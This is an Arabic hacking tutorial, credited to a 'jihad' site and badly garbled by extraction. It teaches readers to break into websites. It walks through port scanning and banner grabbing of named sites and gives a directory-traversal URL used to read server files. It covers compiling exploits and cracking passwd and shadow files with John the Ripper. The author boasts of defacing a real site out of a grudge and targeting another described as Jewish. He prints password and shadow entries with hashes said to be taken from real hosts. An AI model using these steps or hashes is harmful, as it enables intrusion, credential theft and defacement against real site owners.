  ‫إلى هنا و أظن أنني قد تماديت .. و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع‬
                                                                           ‫(ممتع بالنسبة إلي) .‬



                                                                                     ‫مالحظات هامة‬
‫- لربما تتساءل اآلن .. أال أستطيع بدال من كل هذا الهراء أن استخدم برنامج جاهز مثل ‪ CuteFTP‬؟!!‬
‫بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكول‬
                                                                   ‫تستطيع أن تصنع برنامجك الخاص‬
                             ‫- اقرأ الدرس مره و مرتين حتى تستوعب الفكرة تماما ثم اسأل فيما شئت‬
                                             ‫- لتعلم اكثر عن هذا الموضوع قم بزيارة المواقع التالية‬
                            ‫‪http://www.vbip.com/winsock/winsock_ftp_01.asp‬‬
                                                                                   ‫(ينصح به بشده)‬
     ‫‪(http://www.vbip.com/winsock/winsock_ftp_ref_01.htm‬ينصح به بشده)‬
      ‫‪(http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html‬لمن اراد التعمق في‬
                                                                                      ‫البروتوكول).‬


                                            ‫انتهى،،،‬




             ‫" اختراق المواقع (الجزء الثاني) "‬

                                                                         ‫< منقول من موقع الجهاد>‬
                                                                                 ‫<الكاتب: الكندور>‬



                                             ‫602‬
                                                                                         ‫اإلختراق :‬
                                                                                     ‫~~~~~~~~~‬

                                                                                  ‫-المقدمة .‬
                                                           ‫-كيف أجمع معلومات حول الموقع ؟‬
                                                                ‫-كيف يتم كشف نقاط الضعف ؟‬
                                                  ‫-كيف يمكن إستغالل نقاط الضعف المكتشفه ؟‬
                                                ‫-ماهو ملف كلمة المرور ‪ password file‬؟‬
                                                                    ‫-بماذا يفيدني هذا الملف ؟‬
                         ‫-كيف يمكن معرفة كلمة السر من خالل ملف الباسورد ‪ password file‬؟‬
                 ‫-ماالفرق بين إذا كان الملف (مشفر )‪ encryption‬وإذا كان (مضلل )‪ shadowed‬؟‬
                                       ‫-وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟‬
                                        ‫-ولو كان ملف كلمة المرور مضلل ، ماذا علي ان أعمل ؟‬




                                                                                            ‫المقدمة :-‬
                                                                                       ‫~~~~~~~~~‬
‫أعد هذا المستند للباحثين وليس لمن أراد أن يخترق موقع فقط ! أنا أعتبر أن لديك الخبره الالزمه لفهم كل ما‬
     ‫أتحدث عنه ، ال تتوقع إني بقول لك نزل برنامج ( مثل ) ‪ Void Eye‬أو غيره وحط لك في هذا المستند‬
                                 ‫شر ح بالصور وقول لك إخترق مواقع ، العمل المقزز هذا لن نتطرق له أبداً‬




                                                                     ‫-كيف أجمع معلومات حول موقع ؟‬
                                               ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
  ‫أول خطوه تصلحها هي بورت سكان ، أنصحك تستخدم ‪ nmap‬المشهوره واألقواء على اإلطالق،يمكن أن‬
  ‫تبحث عنها هذا إذا ما لقيتها في الموقع ‪ www.inscure.org/nmap‬وهي تعمل على نظام ليونكس ،‬
‫إذا أردت برنامج يعمل على ويندوز انصحك بـ ، ‪ SuperScan‬عليك البحث عنها في اإلنترنت ، سوف تجد‬
       ‫آالف المواقع التي تقدمها لتنزيل ، ومن الممكن أن تستخدم نصوص ‪ Perl‬لعمليه البحث ، لغه ‪Perl‬‬
                                                           ‫أصبحت اللغه محبوبه لدى جميع الهاكر بعد ‪C‬‬
  ‫بعد الحصول على النتائج ، مثال نصلح تجربه على الموقع ) /‪ http://www.7lem.com‬بعض برامج‬
      ‫البحث تطلب وضع رقم اآلي بي للموقع ، والتقبل الدوماين عندها إستخدم ‪ ping‬لتعرف رقم اآلي بي)‬
‫تأتي النتائج ، البورتات (26 - 66 - 36 - 56 - 13 - 222 - 3.2 - 325 - .25 - 105) ويوجد منافذ‬
                                        ‫أخرى لكن لن نهتم لها هنا ، نقوم بعمليه نزع التواقيع للمنافذ...‬

                                                                      ‫ماهي عمليه نزع التواقيع للمنافذ؟‬
    ‫من المعروف أن المنفذ فتح من قبل تطبيق ، عند اإلتصال بهذا المنفذ فسوف يتم إرجاع رد اليك ، مثال لو‬
‫إتصلت بالبورت 36 وهو لتلنت ، وموقع /‪ http://www.7lem.com‬توجد به خدمه تلنت ، ويتضح هذا‬
                                                            ‫من عمليه مسح المنافذ ،اإلتصال بخدمه اتلنت‬
                                                               ‫/‪telnet http://www.7lem.com‬‬


                                                ‫702‬
  ‫يتم تنفيذ األمر التالي في ‪ Windows‬و ‪ Linux‬و ‪ SunOS‬و ‪ FreeBSD‬و ‪QNX‬بنفس الصيغه ،‬
      ‫ولكن أفضل ‪ Linux‬عنها ، وهو ألن لينكس يوفر كل ماتحتاجه من أدوات ...هذا المستند ال يختص بـ‬
                           ‫‪Linux‬لذلك لن أذكرها ، تأتي نتيجه اإلتصال بسيرفر الحلم على بورت التلنت‬

                                                                              ‫----------------------‬
                                                                                     ‫7.5 ‪SunOS‬‬

                                                                     ‫---------------------- ‪: login‬‬

     ‫يتضح بأن السيرفر يعمل على نظام، 7.5 ‪ SunOS‬بقي عليك أن تنتزع التواقيع من البورتات المتبقيه‬
       ‫لتعرف ما هو التطبيق وإصدارته المنصت لها (إستخدم التلنت ) ، وثم تقوم ببحث عن نقاط ضعف لها‬
    ‫وتحصل على شيفرات اإلستثمار الخاصه بها ، الخطوه التاليه هي أن تعرف ما هو ملقم الويب الذي يعمل‬
                                                 ‫على هذا النظام ، نذهب الى الترمينال تبع ليونكس ونكتب‬

                                                             ‫08 /‪nc http://www.7lem.com‬‬

                                                                           ‫----------------------‬
                                                                                                ‫.‬
                                                                                                ‫.‬
                                                                                                ‫.‬
                                                                        ‫‪Apache/1.3.* Server‬‬
                                                                                                ‫.‬
                                                                                                ‫.‬
                                                                           ‫----------------------‬

     ‫أختصرت النتيجه وتم تضليل إصدار ملقم الويب وذلك لحمايه الموقع ، اتمنى أن تستطيع كشفه بنفسك...‬
     ‫من المعروف من عمليه السكان بورت بأن البورتين 222 و 56 مفتوحين ، هذا يدل على أن في الموقع‬
‫خدمة البريد اإللكتروني ، بالطبع هذا يفيدك لمعرفه ‪ smtp‬و ‪ pop‬للموقع ، كل ماعليك فعله هو كتابه األمر‬
                                                                               ‫التالي (في ) ‪Linux‬‬

                                                                               ‫‪host 7lem.com‬‬

                                                                                       ‫وأنتظر النتائج‬

‫مالحظه :- إذا كنت تعيش مع بن الدن ولست عائش في جو تقنيه معلومات كل ما عليك فعله هو تفجيراإليميل‬
                                                               ‫(على حسب ما يسمياها كثير من الناس)‬
    ‫مالحظه ثانيه :- إذا لم تجد في السيرفر خدمه تلنت أو أنه تم تغيير التوقيع عن طريق مثال قرصنه النظام‬
        ‫....الخ ، عليك أن تستخدم ‪ queso‬األداة المفضله لكشف نظام التشغيل ، وهي تعمل على ليونكس ،‬
                                                                               ‫إلستخدامها عليك كتابه‬
                                                            ‫/‪queso http://www.7elm.com‬‬

 ‫كل ماعليك بعد تثبيت األداة في جهازك هو كتابه ‪ queso‬وثم مسافه والموقع ورقم البورت 20 والذي هو‬
                         ‫بطبيعه الحال مفتو ح في جميع المواقع...يأتيك الرد بأن النظام 7.5 ‪SunOS‬‬

‫لو أردت مثال قائمة بالبريدات الموجوده في موقع /‪ http://www.condor.com‬مثال ( ‪ support‬أو‬
 ‫‪webmaster‬أو... ‪ info‬الخ ) أو أدرت معرفه الـ ‪ DNS‬األولي والثانوي للموقع ، أو من هو الشخص‬
‫اللي سجل ومعلومات عنه وما هي الشركه التي تستظيف الموقع ، عليك بإستخدام خدمه ، ‪ whois‬تستطيع‬
 ‫إستخدام خدمه ‪ whois‬وتطلب معلومات من قواعد بيانات ‪ whois‬عن طريق أمر ‪ whois‬في لينكس ،‬
‫أكتب ‪ man whois‬لمزيد من المعلومات ، إذا كنت تستخدم ويندوز أو أي بيئه أخرى أنصحك بالتوجه الى‬
                                                          ‫برمجيات السي جي آي المتواجد في الموقع‬


                                                ‫802‬
                                               ‫‪http://www.psyon.org/tools/index.html‬‬
    ‫توفر لك هذه الصفحه مجموعه من برمجيات السي جي آي التي تسهل لك المهمه ، هناك رياضيات لطلب‬
   ‫معلومات عن موقع ويب بإستخدام ‪ whois‬وهي مفيده جدا ، على كل حال توجه الى الموقع التالي لمزيد‬
                                                                                   ‫من التفاصيل‬
            ‫‪http://www.google.com/search?q=whois&btnG=Google+Search‬‬




                                                                         ‫-كيف يتم كشف نقاط الضعف ؟‬
                                                          ‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬
   ‫ال تستخدم برامج مثل ‪ void eye‬أو ‪ ShadowSecurityScaner‬هذه للمغفلين فقط!!، المحترفين‬
 ‫واللي يبغا يكون محترف ال يستخدم برامج في عمليات اإلختراق ، وال يخترق لمجرد أنه يبغا يخترق ، عمليه‬
      ‫إختراق سيرفر تمتاز بالدقه المتناهيه ، والتخطيط المحكم ، وكل عمليات السطو المحكمه هي التي يصعب‬
‫إكتشاف مرتكبيها ، لكن وهللا لو كنت من اللي يشغل برنامج ومايدري هللا وين حاطه فصدقني إنك مارا ح تفلح‬
        ‫طول عمرك ، هذا لو قدرت تخترق شئ ، فلو حدث وتم اإلختراق بواحد من هذه البرامج فسوف تصطاد‬
                                                                                  ‫بسناره تماما كالسمكه‬
  ‫نقاط الضعف المفضله والتي تعتبر كأسرار وال يكشف عنها اال بعد فتره طويله هي التي في ملقم الويب مثل‬
‫‪Apache‬أو ، ‪ IIS‬وكذلك نقاط الضعف الموجوده في سكربتات ‪ CGI‬و ‪ Perl‬و ، ‪ PHP‬أو التي قد تكون‬
          ‫موجوده في البرنامج المستخدم لتفسير نصوص البيرل أو السي جي آي ، وإذا كان في الموقع برنامج‬
  ‫لتسوق مثال من الممكن أن تستغل فيه نقطه ضعف هذا إذا وجدت به ، يعني اي شئ في السيرفر سوى كان‬
         ‫سكربت بيرل أو سي جي آي..أو كان برنامج تنفيدي أو حتى نظام التشغيل أو ملقم الويب مصاب بنقطه‬
 ‫ضعف من الممكن أن يعرض السيرفر لإلختراق ويعرض كل ما بداخله من أسرار الى المخترق ، سأختار لكم‬
                                                                                        ‫حادثه مره معي‬
                                                                                           ‫،عداد زورا‬
                                                                               ‫‪counter‬عرض موقع‬
      ‫3‪mp‬مشهور لإلختراق في أي لحظه ، أول مادخلت الموقع ونزلت أغنيه ‪ Don't Tell Me‬في الوقت‬
       ‫اللي كانت االغنيه تنزل فيه حبيت أشوف الموقع وأضيع وقت الى أن ينتهي التحميل ، ما كنت أتوقع أني‬
                                                                     ‫بالقي نقاط ضعف فيه ، فتحت التلنت‬
        ‫وشبكت على كم بورت معروف مثل 56 و 36 و 26 و222 الخ ، دخلت منتدى في الموقع واخذت إسم‬
‫المنتدى ‪ Ikonboard v2.1.8b‬توجهة الى كم موقع وبحثت فيها بسرعه عن نقاط ضعف المنتدى ، ولكن‬
    ‫كانت نقاط الضعف لـ ‪ Ikonboard v2.1.8b‬وليس ، ‪ Ikonboard v2.1.7b‬تركنا المنتدى ورحنا‬
       ‫ندور على شئ ثاني ، فتحت السورس تبع الصفحه وبحثت عن ‪ cgi‬و ، ‪ pl‬وجدنا سكريبت ثاني ، علبة‬
     ‫توصيت ، نبحث عن نقاط ضعف لها ، ال شئ تماما ، نكمل البحث عن السكريبتات ، وأخيرا وعندما وصل‬
 ‫التحميل لألغنيه عند % 08 كنت قد توصلت لنقطه ضعف في سكريبت ‪ cgi‬خاص لعداد الزوار ، تمكنك من‬
      ‫عرض أي ملف في السيرفر ، طلبت الملف ‪ etc/passwd‬وطبعا كلمة المرور المسجله في المف كانت‬
 ‫مضلله والنظام كان هو ‪ FreeBSD‬يعني كلمة المرور تكون في نفس الدليل ولكن في ملف ثاني وهوالملف‬
‫‪shadow‬أو ، ‪master.passwd‬التشغل بالك اآلن بما تعنيه كلمة مضلله ومافائده هذا الملف ..كل هذا‬
                                                                  ‫ستعرفه قريبا ...إستمر في القراءة فقط‬
                                                             ‫++++++++++++++++++++++++‬
                                                                                           ‫الجزء الثاني‬
     ‫} ‪{ http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi‬هذا ، ‪ CGI‬ال‬
                                           ‫تستغرب ، هذه هي الحركات الجديده لنشر ال نكمل الموضوع ....‬



                                                 ‫902‬
     ‫ما قلت هذا موقع يهودي وهللا بدمره وصلح عليهم عنتر ولد بو شداد ، أرسلت رساله لنقطه الضعف ،‬
  ‫صلحت لها نسخ ولصق ، ورد علي بالشكر وقائمه باألغاني الجديده لديهم وأخذ فكره حسنه عن المسلمين‬
                                ‫وعن العرب بدل من فكره اإلرهاب اللي حكوماتهم تزرعها في عقولهم‬

 ‫لنأخذ مثال : الموقع ‪ timduff.com‬هذا موقع يستحق التدمير ، وقد تم ذلك ، وهو اآلن تم إرجاعه ولكن‬
                                             ‫من جديد وال يحوي اال القليل من الصفحات ال تتجاوز إثنتان‬

   ‫سمعت عن هذا الموقع في أحد منتديات الهاكرز اإلنجليزيه بأنه يقدم خدمه ال أعلم ما هي بالضبط ، فذهبت‬
          ‫للموقع ألسجل واعرف ماهي ، كان التسجيل عن طريق إرسال معلومات الى بريد اإللكتروني ارسلت‬
   ‫معلومات ، وصلني الرد بعد ساعتين تقريبا ، كا كنت أن الرد يكون كله حش وسب ، ما كنت أقراء اال كالم‬
‫كله حش وسب ، ليش ، تبين لي السبب هو ذكري كلمة ، ‪ i'm from saudi arabia‬ولكن لماذا كل هذا‬
      ‫الحقد ، ومضت ايام وكل يوم والثاني أحقد عليه أكثر وأكثر عشان عنصريته ، اال أن توفقنا ولقينا لملقم‬
  ‫الويب حقه نقطه ضعف في موقعي روسي ، واال اآلن غير مرقوعه ، تقدر تعرض كل الملفات الموجوده في‬
                                          ‫السيرفر ، وتقدر تسحب منها كل ماتريد ، عن طريق اليو آر إل هذا‬

   ‫عنوان الموقع وثم /../../../../../../../../../../../../../../../../../ أو حتى من الممكن أن تضع بعد عنوان‬
                                              ‫الموقع /../ فقط ، هل عرفت ما تعرض لك هذه االخيره !‬


                                      ‫اآلن سوف أضع النقاط األساسيه لكشف نقاط ضعف على موقع ما :-‬

                                                  ‫-1التعرف على كافه الخدمات الموجوده على السيرفر‬
 ‫-2معرفه نظام التشغيل وإصدارته وكذلك ملقم الويب وأي برمجيات أخرى مثل مفسر نصوص بيرل إذا كان‬
                                                          ‫ذلك ممكن ، أو برنامج للبيع والشراء .....الخ‬
       ‫-3عمل جلسه إللتقاط كل السكربتات ) ‪ ( Perl - Cgi‬الموجوده في الموقع ، هذا إذا وجد شئ منها‬
    ‫-4والتنسى تحط البورتات معها ، ألنه أحيانا يكون في البورت نقطه ضعف ، ليس هذا صحيحا 222%‬
       ‫نقطه الضعف ليست في البورت بعينه ، في البرنامج اللي مصلح إنصات للبورت (هذا أقرب تعبير لها)‬
  ‫-5أخيرا يمكنك اإلستفاده من المعلومات التي حصلت عليها في البحث عن نقاط ضعف (يوجد في آخر هذا‬
                  ‫المستند مواقع من ظمنها مواقع تحتوي على أرشيفات قد تفيدك في الحصول على الثغرات)‬




                                                        ‫-كيف يمكن إستغالل نقاط الضعف المكتشفه ؟‬
                               ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
    ‫أبسط الثغرات والتي يستطيع أي مبتدي أن يستخدمها هي تلك التي تنفذ من خالل المتصفح ، مثل المثال‬
                                      ‫السابق ذكره إلختراق الموقع /‪http://www.timduff.com‬‬


  ‫نوع آخر ، يكون اإلستثمار (من اآلن سوف نطلق إسم إستثمار على الطريقه التي تستغل بها الثغره) يكون‬
  ‫اإلستثمار على شكل شفره (كود) مكتوب ببرنامج ‪ sh‬في ليونكس ، وهو ما يسمى بالعربي برنامج الغالف‬
  ‫وباإلنجليزي ‪ shell‬وتكون هذه الشفره تحت ملف باإلمتداد ‪ *.sh‬وتعمل تحت بيئه ليونكس ، وهذا النوع‬
   ‫من اإلستثمارات هو المفضل ويحسس المخترق بالقوه ونظرا لتعدد األداوت في ليونكس فإن لغه ‪shell‬‬
                                           ‫اصبحت قويه فهي تقابل كتابه ملف دفعاتي في ويندوز )‪(bat‬‬


                                                 ‫012‬
  ‫ويوجد نوع من اإلستثمارات ثاني وهو شفره (كود) مكتوب بلغه ‪ C‬المشهوره ، وهذا النوع غالبا ما تحدث‬
   ‫فيه أخطأ أثناء عمليه الترجمه ، قد تواجه كثير من المتاعب لذلك يجب أن تكون لديك خلفيه في لغه سي ،‬
                           ‫ولترجمه هذا النوع عليك بالذهاب الى ليونكس وترجمته بإستخدام المترجم ‪gcc‬‬
                                                                      ‫‪gcc Exploit.c -o Exploit‬‬
         ‫مالحظه مهمه ( يجب أن يكون اإلمتداد للمف ‪ *.c‬وليس ، ‪ *.C‬لو كان حرف ‪ c‬كبتل فسوف يترجم‬
   ‫اإلستثمار وكأنه كتب في سي ++ ، الشئ الثاني تأكد من توفر المكتبات )‪ (*.h‬التي يتطلبها اإلستثمار قبل‬
                                                                                             ‫تشغيله)‬
                                                  ‫عليك زياره موقعي فهناك مستندات في البرمجه قد تنفعك‬


‫يوجد نوع ظهر مؤخرا من اإلستثمارات وبداء ينتشر وهو أيضا شفره ولكن مكتوبه بلغه ‪ Perl‬ومن الممكن‬
‫أن يتم تشغيل هذا النوع من موجه الدوس في ويندوز (يجب أن تملك برنامج يفسر شفرات البيرل مثل أكتيف‬
                                                                                         ‫بيرل)‬


                                      ‫وأحيرا انواع نادره من اإلستثمارات قد تكون على شكل خطوات ....‬


                                                                                ‫= ‪Exploit‬إستثمار‬




                                                  ‫-ماهو ملف كلمة المرور ‪ password file‬؟‬
                                  ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
   ‫ملف كلمة المرور معروف من إسمه ، هو الذي في داخله توجد حسابات األشخاص المرخص لهم بالدخول‬
                                                                       ‫الى السيرفر ، مثل هذا‬

     ‫------------------------------------------------------------------------------------------------‬
     ‫:‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin‬‬
              ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬
   ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬
                                               ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬
 ‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬
                          ‫:/:‪Admin:/usr/net/nls: nobody:x:60001:60001:Nobody‬‬
                                        ‫:/:‪noaccess:x:60002:60002:No Access User‬‬
                                     ‫:/:‪nobody4:x:65534:65534:SunOS 4.x Nobody‬‬
                                                          ‫‪www:x:102:1001::/web:/bin/csh‬‬
                           ‫‪mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬
                                              ‫‪sid:x:103:10::/export/home/sid:/bin/ksh‬‬
‫‪mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh‬‬
       ‫‪jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬


                                                ‫112‬
                                  ‫‪landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬
     ‫------------------------------------------------------------------------------------------------‬
‫وقد تكون أكثر بكثير ، حيث أن هذا الملف الموضح باألعلى أختصر بشكل كبير ، فعند سحبه كان يحتوي على‬
      ‫آالالف السطور ، ليس كل ملفات كلمات المرور بهذا الحجم فيوجد منها من ال يتجاوز 22 أسطر وهي‬
      ‫الموجوده بكثره ، على العموم أنت الحين عليك تعرف بأن ملف كلمة المرور هو الذي في داخله توجد‬
                                            ‫حسابات األشخاص المرخص لهم بالدخول الى السيرفر ......‬




                                                                          ‫-بماذا يفيدني هذا الملف ؟‬
                                                       ‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬
  ‫يفيدك يا الحبيب في معرفه كلمات السر وإسماء المستخدمين لكي تقوم بإختراق الموقع ، ولكن التفر ح ...!‬
      ‫كلمة المرور تكون مشفره ، ال هذا ليس صحيحا تماما ، كانت مشفره زمان ولكن في الوقت الحالي هي‬
                                                                                             ‫مضلله‬

                                                             ‫*او = ‪ x‬كلمة سر مضلله ‪Shadowed‬‬

   ‫= ‪EpGw4GekZ1B9U‬كلمة سر مشفره على مقياس ، ‪ DES‬هذا النوع من التشفير المستخدم في‬
    ‫ليونكس و ‪ FreeBSD‬وعدد من األنظمه األخرى ضعيف ، وهو دائما مكون من 32 حرف ورقم كبتل‬
  ‫وسمول وال يحتوي من بينها على رمز ابداً ، بإستثناء ويندوز فهو يستخدم نوع آخر من التشفير وهو نوع‬
                                                                                      ‫ضعيف أيضا‬




                       ‫-كيف يمكن معرفة كلمة السر من خالل ملف الباسورد ‪ password file‬؟‬
               ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬

                                                                                ‫~~~~~~~~~~~~‬
     ‫إضغط ‪ Ctrl + Shift‬في القسم األيمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ، ثم إذهب الى‬
                 ‫االعلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع ... ‪hwwilson.com‬‬
                                                                                 ‫تفسير هذا السطر :-‬
                                                         ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬

                                                                                         ‫‪root‬‬
                                                      ‫هذا السطر يوضخ المستخدم واللي هو الجذر‪root‬‬



                                                ‫212‬
                                                                                               ‫‪x‬‬
‫وكلمة المرور ، ويتضح انها مضلله ، يعني مكانها العالمة ، ‪ x‬ال تفكر في كسرها فهذا مستحيل ، لكن عليك‬
                      ‫البحث عن ملف ثاني تم تخزين فيه كلمة المرور ، ستعرف بعد قليل كيف تفعل هذا‬


                                                                                              ‫0‬
                                                                             ‫هذا هو رقم المستخدم‬


                                                                                             ‫1‬
                                                                                   ‫رقم المجموعه‬


                                                       ‫‪Super-User:/:/sbin/sh‬‬
                                                                          ‫هذا مش مهم‬
                                          ‫++++++++++++++++++++++++++++‬
                                                                          ‫الجزء الثالث‬
              ‫-ماالفرق بين إذا كان الملف (مشفر )‪ encryption‬وإذا كان (مضلل )‪ shadowed‬؟‬
             ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬

                                                            ‫~~~~~~~~~~~~~~~~~~~~~~‬
       ‫الملف المضلل ‪ shadow file‬يكون مكان كلمة المرور رمز مثل * أو ‪ x‬أو # أو ! وهذا مثال لها‬
                                                      ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬

                                  ‫لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه‬
                               ‫‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬
                                       ‫هنا تكون كلمة المرور المشفره هي ‪Q71KBZlvYSnVw‬‬

                                                                     ‫اآلن طلعت الصوره صافيه ....‬




                               ‫-وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟‬
             ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬

                                                                                       ‫~~‬
‫البرامج كثيره وأشهرها هو ‪ Crack 5.0a‬و ‪ john the ripper‬ويوجد آخر بإسم ‪jack the ripper‬‬
       ‫،إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ، عليك تنزيل ، ‪ Crack 5a‬وأفضل ‪john the‬‬
 ‫‪ripper‬لمن يريد إستخدام ويندوز ، وللمعولميه فإن ‪ john the ripper‬عمل أيضا تحت ليونكس .....‬

                                                                       ‫طريقه عمل هذه البرامج :-‬
                  ‫يقدم للبرنامج ‪ wordlist‬ويقوم بمطابقه الكلمات الموجوده به ، كما هو موضح هنا .‬



                                             ‫312‬
       ‫\ ------------------------------------------------------------------------------------------------‬
                                                                         ‫------< ‪Q2wrtUo9LPq2R‬‬
‫يتم مقارنه | //{ ---< البدايه} كلمة المرور | /---/ المشفره مع | / 2 / أخذ كلمة من الـ ‪ wordlist‬الكلمات‬
       ‫| / 2 / _____________ المختاره حتى | {تشفير}/ 2 / | | يتم --------^--------- / 2 |----\ /‬
                ‫| ‪word list‬التطابق-< ‪ Q6LiJ6ct1oUBz‬كلمة مرور مشفره /---/ الكلمة المختاره |‬
         ‫\ ------‪|_____________| ------------------ //--------song‬إذا حدث تطابق فهذا يعني أن‬
                                                                             ‫كلمة المرور التي كانت مشفره‬
                                                                                              ‫قد كسرت ..‬
 ‫| ------------------------------------------------------------------------------- |مالحظه مهمه :- يتم‬
                                    ‫عمل دوره مثل الموضحه في األعلى لكسر كلمات المرور المشفره بسرعه‬
                ‫{النهايه} | 2225 تجربه في الثانيه (إختبرنا‪john the ripper‬على معالج بسرعه 221)‬
                        ‫------------------------------------------------------------------------------- |‬
        ‫------------------------------------------------------------------------------------------------‬
                                                           ‫هذه الرسمه تعبت عليها عشان كذا ال أحد يسرقها‬

                                           ‫لتشغيل ‪ john the ripper‬من واجه دوس نكتب األمر التالي‬

                                                                 ‫‪john -w:wordlist passwd‬‬
                              ‫حيث ‪ wordlist‬هو ملف القاموس الذي يحتوي على عدد كبير من الكلمات‬
                      ‫و ‪ passwd‬هو الملف الذي يحتوي على كلمات المرور المشفره والتي نود معرفتها‬

       ‫------------------------------------------------------------------------------------------------‬
                                                                   ‫89 ‪Microsoft(R) Windows‬‬
                                               ‫(.8991-1891 ‪C)Copyright Microsoft Corp‬‬

                    ‫‪E:\Desktop\junk\john the ripper>john -w asswd passwd.txt‬‬

                    ‫6991 )‪by Sola 97,John the Ripper Version 1.3 Copyright (c‬‬

                                                                           ‫‪Loaded 1 password‬‬

                          ‫‪**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬

                                                         ‫‪>E:\Desktop\junk\john the ripper‬‬
       ‫------------------------------------------------------------------------------------------------‬

  ‫وسوف تحفظ النتيجه في الملف ‪ john.pot‬الموجود في نفس الدايروكتري ، وعليك حذف هذا الملف إذا‬
 ‫أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى ذلك‬
                                                                                              ‫...‬

   ‫هناك طريقه اخرى للكسر وهي تسمى بـ ‪ brute force‬أو بالعربي القوه العنيفه ، وهي ال تحتاج لملف‬
 ‫، ‪wordlist‬هي تقوم بتجربه كل الحروف واألرقام والرموز مع بعض في خانتان و3خانات واربع وخمس‬
 ‫..الخ حتى تصيب كلمة المرور الصحيحه ، وأنا افضل ان تستخدم ملفات ‪ wordlist‬فذلك لن يأخذ معك في‬
    ‫اال ثواني فقط ألن عمليه التجربه الموضحه في الرسم باألعلى ذكرت بأنه سرعة تجربه الكلمات يتجاوز‬
    ‫2225 كلمة في الثانيه ، إذا لم تفلح ملفات ‪ wordlist‬حينها إذهب الى القوه العنيفه ‪brute force‬‬
                  ‫األمر التالي يجعل ‪ john the ripper‬يستخدم طريقه ‪ brute force‬السابق ذكرها‬

                                                                                   ‫‪john -i passwd‬‬

   ‫حيث ‪ passwd‬هو ملف كلمة المرور المراد كسره ، إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل‬


                                                  ‫412‬
                                                                     ‫البرنامج لترى الى أين توصل ...‬




                               ‫-ولو كان ملف كلمة المرور مضلل ، ماذا علي ان أعمل ؟‬
             ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬

                                                                                               ‫~‬
      ‫دائما سوف تواجه كلمة مرور مضلله ، لكن هناك طريقه تسمى ‪ Unshadow‬لحل هذه المشكله !!‬
     ‫إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو (ملف الظل ‪) shadow file‬‬
   ‫وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي :‬

                                                      ‫* = ‪Linux : /etc/shadow token‬‬
                         ‫= ‪SunOS : /etc/shadow token‬يأخذ أشكال متعدده اشهرها هو *‬
         ‫* = ‪FreeBSD : /etc/master.passwd or /etc/shadow token‬والجديد هو ‪x‬‬
                                                       ‫‪IRIX : /etc/shadow token = x‬‬
                                             ‫! = ‪AIX : /etc/security/passwd token‬‬
                           ‫* = ‪ConvexOS : /etc/shadow or /etc/shadpw token‬‬

 ‫‪token‬تعني الرمز الذي يوجد في الملف ، ‪ passwd‬وهذا يفيد في تسهيل المهمه ، يعني لو مثال لقيت‬
     ‫عالمه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في ، ‪ /etc/security/passwd‬لقد‬
   ‫إستعنت بالجدول السابق ذكره ، مثال على ملف شادو (أكرر ملف شادو هو الملف الذي تخزن فيه كلمة‬
                                                                             ‫المرور الصحيحه)‬

                                                                                 ‫هذا ملف ‪shadow‬‬
    ‫------------------------------------------------------------------------------------------------‬
    ‫::::::5446:‪root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP‬‬
   ‫::::::53901:‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc‬‬
                                                                               ‫::::::5446:‪lp:NP‬‬
    ‫------------------------------------------------------------------------------------------------‬
                                                                        ‫نالحظ ان كلمات السر موجوده‬

 ‫الخطوه األخيره وهي دمج ملف الباسورد ‪ passwd file‬مع ‪ shadow passwd‬لنحصل على ملف‬
                                     ‫متكامل ونقدمه الى برامج الكسر السابق ذكرها...‬

   ‫هذا ملف باسورد حصلنا عليه من ‪http://wilsonweb2.hwwilson.com/etc/passwd‬‬
  ‫------------------------------------------------------------------------------------------------‬
   ‫:‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin‬‬
